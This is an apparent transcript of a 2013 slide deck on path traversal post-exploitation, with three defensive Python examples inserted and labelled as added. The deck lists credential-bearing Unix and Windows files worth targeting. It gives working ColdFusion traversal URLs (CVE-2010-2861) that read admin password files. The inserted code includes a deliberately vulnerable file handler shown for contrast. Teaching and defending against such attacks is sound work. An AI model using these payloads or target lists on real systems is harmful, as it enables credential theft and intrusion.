Path traversal post exploitation
By George Lagoda
Nov 23, 2013
This slide intentionally left blank
(always dreamed of it)
Common understanding of path traversal
A Path Traversal attack aims to access files and directories that are stored outside
the web root folder.
(OWASP)
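What the OWASP definition means in code, as an added example that is not part of the deck: a file handler with the bare join that lets `../` (and the other variants used later in this deck: backslash separators, percent-encoding, a `%00` byte) escape the document root, next to a hardened resolver that canonicalizes first and only then confines the result. The function names, the temporary directory layout and the sample requests are constructed for this example.

```python
"""Vulnerable vs. hardened file serving for the path traversal definition above.
Hypothetical example written for this page; not the deck's or OWASP's code."""
import os
import tempfile
import urllib.parse


class PathTraversalError(ValueError):
    """Raised when a requested path would resolve outside the web root."""


def serve_file_vulnerable(web_root: str, user_path: str) -> bytes:
    """The bug the deck relies on: a bare join, so '../' climbs out of web_root
    and an absolute request replaces it entirely (os.path.join discards web_root)."""
    with open(os.path.join(web_root, user_path), "rb") as fh:
        return fh.read()


def resolve_safe_path(web_root: str, user_path: str) -> str:
    """Map a user-supplied path onto a canonical path confined to web_root.

    Covers the variants this deck's payloads use: '../' climbs, backslash
    separators (the ColdFusion locale payloads), percent-encoding, and a %00
    byte that truncates the name in C-based and older Java/ColdFusion layers.
    """
    # One round of percent-decoding. We open the resulting path ourselves, so a
    # leftover "%2e%2e" after decoding is a literal (odd) filename, not a climb;
    # double encoding only bites layers that decode a second time.
    decoded = urllib.parse.unquote(user_path)
    if "\x00" in decoded:
        raise PathTraversalError("NUL byte in requested path")
    # Treat backslash as a separator on every platform, so '..\' cannot slip
    # past a check that only understands '/'.
    decoded = decoded.replace("\\", "/")
    root = os.path.realpath(web_root)
    # Strip leading slashes so an absolute request is anchored under root, then
    # canonicalize: realpath collapses '..' and follows symlinks before we check.
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    # Compare with the separator appended: a plain prefix test would accept
    # /var/www-old when root is /var/www.
    if candidate != root and not candidate.startswith(root + os.sep):
        raise PathTraversalError(f"{user_path!r} resolves outside {root}")
    return candidate


def serve_file_hardened(web_root: str, user_path: str) -> bytes:
    with open(resolve_safe_path(web_root, user_path), "rb") as fh:
        return fh.read()


def build_demo_tree() -> tuple:
    """Constructed layout for the demo: <tmp>/www/index.html inside the root,
    <tmp>/secret.txt one level above it (standing in for /etc/passwd)."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "www")
    os.mkdir(root)
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write("<h1>inside</h1>")
    with open(os.path.join(base, "secret.txt"), "w") as fh:
        fh.write("outside the web root")
    return root, base


def demo() -> dict:
    """Run both handlers against the same requests and report what each did."""
    root, _base = build_demo_tree()
    results = {
        "vulnerable_leaks": serve_file_vulnerable(root, "../secret.txt") == b"outside the web root",
        "hardened_serves_legit": serve_file_hardened(root, "index.html") == b"<h1>inside</h1>",
        "hardened_blocks": [],
    }
    for req in ("../secret.txt", "..%2fsecret.txt", "..\\secret.txt", "index.html%00.jpg", "/../secret.txt"):
        try:
            serve_file_hardened(root, req)
            results["hardened_blocks"].append((req, False))
        except PathTraversalError:
            results["hardened_blocks"].append((req, True))
    return results


if __name__ == "__main__":
    print(demo())
```

The order of operations is the point: decode, reject NUL, fold separators, canonicalize, then compare. Checking for `..` before canonicalizing (or comparing before `realpath`) is how symlinks and encoded variants slip through.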
WHAT FILES AND DIRS OUTSIDE THE WEB ROOT DO WE NEED AND WHY?
/etc/passwd – why so special?
Y.O.B.A. hacking
NEXT STEPS
1. /root/.bash_history
If not accessible, try harder: /home/username/.bash_history gave me:
Looks like epic win??:
After analyzing prepare_release.sh:
.netrc file
• Provides "remember me" for FTP
What I had when I checked /home/username/.netrc:
machine ftp.server.com
login secret_usr
password secret_pwd
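A defender's counterpart to the .netrc and history files above, as an added example that is not the deck's code: an audit that walks a home directory for the credential-bearing dotfiles this deck lists, reports any that are readable beyond their owner, and parses `.netrc` with Python's stdlib `netrc` module to show which hosts have a stored password. The demo home directory, its contents and the placeholder key material are constructed.

```python
"""Inventory of the credential-bearing dotfiles this deck lists (.netrc,
.bash_history, .ssh/id_*, .gnupg/secring.gpg) with the checks a defender runs
before an attacker reads them through traversal. Hypothetical helper written
for this page; not the deck's code."""
import glob
import os
import stat
import tempfile
from netrc import netrc, NetrcParseError

# Globs relative to a home directory; .pub keys are skipped below since they
# are meant to be readable.
CREDENTIAL_GLOBS = (".netrc", ".bash_history", ".ssh/id_*", ".gnupg/secring.gpg")


def netrc_hosts_with_passwords(path: str) -> list:
    """(host, login) pairs for which the file stores a plaintext password."""
    try:
        # stdlib parser; with an explicit path it does no ownership/mode check,
        # so we do that ourselves in audit_home
        entries = netrc(path).hosts
    except NetrcParseError:
        return []
    return [(host, login) for host, (login, _account, password) in entries.items() if password]


def audit_home(home: str) -> list:
    """Return (relative path, finding) pairs for files readable beyond their
    owner (any bit of 0o077 set) and for .netrc entries holding passwords."""
    findings = []
    for pattern in CREDENTIAL_GLOBS:
        for path in sorted(glob.glob(os.path.join(home, pattern))):
            if path.endswith(".pub") or os.path.islink(path) or not os.path.isfile(path):
                continue
            rel = os.path.relpath(path, home)
            mode = stat.S_IMODE(os.stat(path).st_mode)
            if mode & 0o077:
                findings.append((rel, f"mode {mode:04o}: readable beyond the owner, expected 0600"))
            if rel == ".netrc":
                for host, login in netrc_hosts_with_passwords(path):
                    findings.append((rel, f"stores a plaintext password for {login}@{host}"))
    return findings


def build_demo_home() -> str:
    """Constructed home directory: the .netrc from the deck (with the usual
    too-open mode), a world-readable shell history, and a properly locked key."""
    home = tempfile.mkdtemp()
    os.mkdir(os.path.join(home, ".ssh"))
    files = {
        ".netrc": ("machine ftp.server.com\nlogin secret_usr\npassword secret_pwd\n", 0o644),
        ".bash_history": ("ftp ftp.server.com\n./prepare_release.sh\n", 0o644),
        ".ssh/id_rsa": ("-----BEGIN OPENSSH PRIVATE KEY-----\nPLACEHOLDER\n-----END OPENSSH PRIVATE KEY-----\n", 0o600),
        ".ssh/id_rsa.pub": ("ssh-rsa PLACEHOLDER user@host\n", 0o644),
    }
    for rel, (content, mode) in files.items():
        path = os.path.join(home, rel)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, mode)
    return home


if __name__ == "__main__":
    for rel, finding in audit_home(build_demo_home()):
        print(f"{rel}: {finding}")
```

Run it over `/home/*` on a host you administer and the output is exactly the list an attacker with a traversal bug would be working from; the fix for each line is a `chmod 600`, moving the secret into a credential store, or deleting it.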
Help for shell uploading
/proc/self/environ
/proc/self/status
Useful if we wanna find the access or error logs of Apache or the document root of the server, or if we also have LFI and wanna exploit Apache log poisoning.
Something for creds
• SSH keys, often passwordless: /home/*/.ssh/id*
• Kerberos tickets: /tmp/krb5cc_*, /tmp/krb5.keytab
• PGP keys: /home/*/.gnupg/secring.gpg
What distro do we have?
• /etc/SUSE-release # Novell SUSE
• /etc/redhat-release, /etc/redhat_version # Red Hat
• /etc/fedora-release # Fedora
• /etc/slackware-release, /etc/slackware-version # Slackware
• /etc/debian_release, /etc/debian_version # Debian
• /etc/mandrake-release # Mandrake
• /etc/sun-release # Sun JDS
• /etc/release # Solaris/Sparc
• /etc/gentoo-release # Gentoo
• /etc/arch-release # Arch Linux (file will be empty)
• arch # OpenBSD; sample: "OpenBSD.amd64"
What about Windows?
File: expected contents / description
%SYSTEMDRIVE%\boot.ini
    A file that can be counted on to be on virtually every Windows host. Helps with confirmation that a read is happening.
%WINDIR%\win.ini
    Another file to look for if boot.ini isn't there or isn't coming back, which is sometimes the case.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
    Stores users' passwords in a hashed format (LM hash and NTLM hash). The SAM file in repair is locked, but can be retrieved using forensic or Volume Shadow Copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system
%SYSTEMDRIVE%\autoexec.bat
%SYSTEMDRIVE%\pagefile.sys
    Large file, but contains spill-over from RAM; usually lots of good information can be pulled, but it should be a last resort due to size.
%WINDIR%\system32\logfiles\httperr\httperr1.log
    IIS 6 error log
%SystemDrive%\inetpub\logs\LogFiles
    IIS 7's log location
%WINDIR%\system32\logfiles\w3svc1\exYYMMDD.log (year month day)
%WINDIR%\system32\config\AppEvent.Evt
%WINDIR%\system32\config\SecEvent.Evt
%WINDIR%\system32\config\default.sav
%WINDIR%\system32\config\security.sav
%WINDIR%\system32\config\software.sav
%WINDIR%\system32\config\system.sav
%WINDIR%\system32\CCM\logs\*.log
%USERPROFILE%\ntuser.dat
U really thought I will forget bout kittens?
• /etc/passwd
• /etc/shadow (gotta try..)
• /etc/shadow~ # (sometimes there when edited with gedit)
• /etc/master.passwd
• /etc/group
• /etc/hosts
• /etc/crontab
• /etc/sysctl.conf
• /etc/resolv.conf
• /etc/samba/smb.conf
• /etc/exports
• /etc/auto.master
• /etc/auto_master
• /etc/fstab
• /etc/sudoers
Some SW defaults
http://wiki.apache.org/httpd/DistrosDefaultLayout
Also for ColdFusion (not the latest version, but still):
ColdFusion 6:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties%00en
ColdFusion 7:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties%00en
ColdFusion 8:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
All versions:
http://site/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\JRun4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties%00en
http://www.cvedetails.com/cve/CVE-2010-2861/
• In case you still don't have a path traversal to post-exploit, maybe this tool could be useful for you: http://dotdotpwn.blogspot.ru/
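The other side of the access log mentioned on the /proc/self/environ slide: a detector, added here and not part of the deck, that normalizes each request (nested percent-decoding, backslash folding), flags the traversal techniques the deck's payloads use (`../` climbs, backslash separators, `%00` truncation) and names which of the listed sensitive files a request reached for, scoring a 200 on a known target as a likely successful read. Double-encoded variants are included as an assumption beyond what the deck shows, since scanners like the one linked above typically emit them. The log lines, client addresses and helper names are constructed for this example.

```python
"""Detection side of the traversal payloads described on this page: normalize
each request in an Apache access log, flag the techniques used, and name the
sensitive file it reached for (a subset of the Unix, Windows and ColdFusion
targets the deck lists). Hypothetical detector written for this page; not the
deck's code. The log lines below are constructed, not real traffic."""
import re
import urllib.parse

SAMPLE_LOG = """\
203.0.113.5 - - [23/Nov/2013:10:01:02 +0400] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Nov/2013:10:01:03 +0400] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Nov/2013:10:01:04 +0400] "GET /index.php?page=..%2f..%2f..%2fproc%2fself%2fenviron HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Nov/2013:10:01:05 +0400] "GET /index.php?page=%252e%252e%252f%252e%252e%252fetc%252fshadow HTTP/1.1" 403 211 "-" "Mozilla/5.0"
198.51.100.7 - - [23/Nov/2013:10:02:00 +0400] "GET /CFIDE/administrator/enter.cfm?locale=..\\..\\..\\..\\ColdFusion8\\lib\\password.properties%00en HTTP/1.1" 200 4096 "-" "curl/7.30"
198.51.100.7 - - [23/Nov/2013:10:02:01 +0400] "GET /download?file=..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 0 "-" "curl/7.30"
192.0.2.9 - - [23/Nov/2013:10:03:00 +0400] "GET /images/logo.png HTTP/1.1" 200 7000 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identd, user, [timestamp], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
CLIMB_RE = re.compile(r"\.\.(?:/|$)")

# Substrings (matched on the lowercased, normalized request) drawn from the
# files this deck lists; the value is the defender's label for the target.
SENSITIVE = {
    "/etc/passwd": "account list",
    "/etc/shadow": "password hashes",
    "/proc/self/environ": "process environment (document root, log paths)",
    "/.bash_history": "shell history",
    "/.netrc": "stored FTP credentials",
    "/.ssh/id_": "SSH private key",
    "boot.ini": "Windows read confirmation",
    "win.ini": "Windows read confirmation",
    "/repair/sam": "SAM hive (password hashes)",
    "password.properties": "ColdFusion admin password hash",
}


def normalize(target: str) -> tuple:
    """Peel nested percent-encoding (%2e, %252e, ...) and fold backslashes to
    '/'. Returns (normalized request, number of decode rounds that changed it)."""
    rounds, current = 0, target
    while rounds < 3:
        decoded = urllib.parse.unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current.replace("\\", "/"), rounds


def analyze_line(line: str):
    """Return a finding dict for a traversal-looking request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = m.group("target")
    path, rounds = normalize(raw)
    techniques = []
    if CLIMB_RE.search(path):
        techniques.append("dot-dot climb")
    if "\\" in raw or "%5c" in raw.lower():
        techniques.append("backslash separator")
    if rounds > 1:
        techniques.append("double encoding")
    if "\x00" in path:
        techniques.append("null-byte truncation")
    if not techniques:
        return None
    lowered = path.lower()
    target = next((label for key, label in SENSITIVE.items() if key in lowered), None)
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "status": status,
        "path": path.replace("\x00", "\\x00"),
        "techniques": techniques,
        "target": target,
        "encoding_rounds": rounds,
        # A 200 on a known sensitive file is the line worth paging someone about.
        "likely_success": status == 200 and target is not None,
    }


def analyze(log_text: str) -> list:
    return [f for f in (analyze_line(l) for l in log_text.splitlines()) if f]


def hits_per_source(findings: list) -> dict:
    """Scanner-style fuzzing shows up as many hits from one client."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for f in found:
        print(f)
    print(hits_per_source(found))
```

Two details matter in practice: the status code alone is not a verdict (a 200 from an LFI page that echoes the include still needs the response size compared against the normal page), and the normalization must match what the application does, otherwise a `%5c` that the app folds to `\` is invisible to a rule that only knows `/`.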
Why so serious?
Thank you for visiting us
And
HACK YOU
(the end).